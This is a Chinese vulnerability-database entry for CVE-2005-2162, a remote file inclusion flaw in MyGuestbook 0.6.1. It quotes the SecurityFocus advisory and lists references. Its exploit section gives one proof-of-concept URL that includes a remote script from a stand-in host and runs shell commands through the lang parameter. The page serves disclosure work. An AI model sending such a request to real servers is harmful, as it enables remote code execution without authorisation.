MyGuestbook form.inc.php3 远程文件包含漏洞

MyGuestbook form.inc.php3 远程文件包含漏洞

漏洞ID 1108912 漏洞类型 未知
发布时间 2005-07-05 更新时间 2005-07-06
图片[1]-MyGuestbook form.inc.php3 远程文件包含漏洞-安全小百科CVE编号 CVE-2005-2162
图片[2]-MyGuestbook form.inc.php3 远程文件包含漏洞-安全小百科CNNVD-ID CNNVD-200507-063
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/25941
https://www.securityfocus.com/bid/89781
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-063
|漏洞详情
MyGuestbook是一个简单的Web留言板程序。MyGuestbook0.6.1的form.inc.php3中存在PHP远程文件包含漏洞。远程攻击者可通过lang参数执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/14155/info

MyGuestbook is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/gb/form.inc.php3?lang=http://www.example.com/cmd.gif?&cmd=id;uname%20-a;uptime
|受影响的产品
LEVCGI.COM MyGuestbook 0.6.1
|参考资料

来源:MISC
链接:http://www.soulblack.com.ar/repo/papers/advisory/myguestbook_advisory.txt
来源:BUGTRAQ
名称:20050705MyGuestbookRemoteFileInclusion.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112059876828730&w;=2
来源:SECTRACK
名称:1014387
链接:http://securitytracker.com/id?1014387
来源:SECUNIA
名称:15927
链接:http://secunia.com/advisories/15927

相关推荐: Tower Toppler HOME Environment Variable Local Buffer Overflow Vulnerability

Tower Toppler HOME Environment Variable Local Buffer Overflow Vulnerability 漏洞ID 1099834 漏洞类型 Boundary Condition Error 发布时间 2003-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享